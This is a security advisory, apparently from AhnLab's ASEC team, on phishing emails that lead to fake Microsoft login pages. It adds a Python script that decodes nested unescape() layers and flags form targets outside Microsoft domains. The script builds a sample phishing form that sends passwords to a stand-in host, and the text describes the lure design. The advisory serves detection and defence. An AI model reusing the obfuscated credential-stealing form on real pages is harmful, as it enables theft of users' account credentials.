The ASEC analysis team has recently discovered phishing emails disguised as Microsoft login pages.
As shown in the figure below, one of the collected samples is disguised as the company’s voice message to prompt users to click the attached playback file. Clicking the file redirects users to a phishing webpage disguised as a Microsoft login page.
Another sample carries an attachment disguised as a document sent from a scanner, prompting users to open it. Again, clicking the file redirects users to a phishing webpage disguised as a Microsoft login page.
For both samples, clicking the attachment redirects users to a webpage that closely resembles the Microsoft login page (see Figures 3 and 4). The webpage already has the email address filled in and only asks users to enter their password. In the sample from Figure 4, the website first displays a page disguised as an automatic sign-in process. It then behaves as if the automatic sign-in failed and redirects users to a phishing page that asks for their account credentials. Because the flow mimics Microsoft's real login process, users may enter their password without suspecting anything.
The phishing webpages in both samples are built by decoding a percent-encoded string inside the script and writing the result into the DOM (see Figure 5); the decoding step is applied repeatedly, one layer at a time. Removing the encoding with unescape reveals the HTML that is ultimately rendered (see Figure 6).
After the user enters the password and clicks the login button on the phishing page, the password is sent to a server controlled by the attacker that has no relation to Microsoft (see Figure 7).
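As an added illustration (not code from the ASEC post), the Python script below peels nested `unescape()` layers the way an analyst would when examining a page like the one in Figure 5, then flags any form target whose host is outside an assumed allowlist of Microsoft sign-in domains. The sample script and the `collector.example` host are constructed for this example.

```python
import re
from urllib.parse import quote, urlparse

# Constructed sample: HTML that posts the password off-site, wrapped in two
# layers of document.write(unescape('...')), as the phishing pages do.
INNER_HTML = ('<form action="https://collector.example/login.php" method="post">'
              '<input name="password" type="password"></form>')
_LAYER1 = "document.write(unescape('" + quote(INNER_HTML, safe='') + "'))"
SAMPLE_SCRIPT = "document.write(unescape('" + quote(_LAYER1, safe='') + "'))"

# Assumed allowlist of hosts a genuine Microsoft login form may submit to.
TRUSTED_SUFFIXES = (".microsoft.com", ".microsoftonline.com", ".live.com", ".office.com")

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
ACTION_ATTR = re.compile(r"<form[^>]*\baction=[\"']([^\"']+)[\"']", re.I)


def js_unescape(s):
    """Decode JavaScript unescape() input: %XX bytes and %uXXXX code units."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def unwrap_layers(script, max_layers=10):
    """Repeatedly decode the first unescape('...') argument; innermost stage last."""
    layers, current = [], script
    for _ in range(max_layers):
        m = UNESCAPE_CALL.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
        layers.append(current)
    return layers


def offsite_actions(markup):
    """Return form targets whose host is not on the trusted allowlist."""
    bare = {s.lstrip(".") for s in TRUSTED_SUFFIXES}
    flagged = []
    for url in ACTION_ATTR.findall(markup):
        host = (urlparse(url).hostname or "").lower()
        if not (host.endswith(TRUSTED_SUFFIXES) or host in bare):
            flagged.append(url)
    return flagged


def analyze(script):
    """Peel the encoding layers and report where the final form submits credentials."""
    layers = unwrap_layers(script)
    final = layers[-1] if layers else script
    return {"layers": len(layers), "final_html": final, "offsite_actions": offsite_actions(final)}
```

Running `analyze(SAMPLE_SCRIPT)` reports two decoding layers and the off-site collector URL, which is the kind of indicator worth blocking at the proxy or mail gateway.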
As the attacker can gain access to the user’s company email account with the stolen account credentials and leak sensitive information, extreme caution is advised.
Users should refrain from opening attachments in emails from unknown sources and entering account credentials in suspicious webpages.
AhnLab is currently blocking the domain of this phishing page.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.